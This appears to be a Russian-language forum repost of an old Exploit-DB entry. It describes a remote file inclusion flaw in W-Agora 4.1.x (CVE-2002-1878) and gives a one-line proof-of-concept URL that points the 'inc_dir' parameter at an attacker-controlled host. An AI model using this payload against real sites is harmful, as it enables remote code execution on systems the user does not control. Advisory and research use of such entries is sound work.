Exploit W-Agora 4.1.x - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21529
Проверка EDB
  1. Пройдено
Автор
FROG
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2002-1878
Дата публикации
2002-06-10
Код:
source: https://www.securityfocus.com/bid/4977/info

W-Agora is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. In particular, the 'inc_dir' variable found in a number of the W-Agora scripts defines the path to the configuration file. It is possible, under some configurations, for an attacker to specify an arbitrary value for the location of the configuration file which points to a file on a remote server.

If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code.

http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
 
Источник
www.exploit-db.com

Похожие темы